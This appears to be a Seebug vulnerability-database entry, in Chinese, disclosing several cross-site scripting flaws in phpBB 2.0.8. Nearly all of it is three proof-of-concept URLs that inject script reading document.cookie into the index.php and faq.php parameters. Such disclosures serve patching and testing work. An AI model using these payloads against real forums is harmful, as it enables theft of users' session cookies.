phpBB多个跨站脚本执行漏洞 Exploit

2006-12-08T00:00:00
ID SSV:5782
Type seebug
Reporter Root
Modified 2006-12-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Janek Vind (come2waraxe@yahoo.com)提供了如下测试方法:

B1 - XSS in "index.php":

http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>
&category_rows[0][cat_order]=99


B2 - XSS in "language\lang_english\lang_faq.php":

http://localhost/phpbb208/faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe


B3 - XSS in "language\lang_english\lang_bbcode.php ":

http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe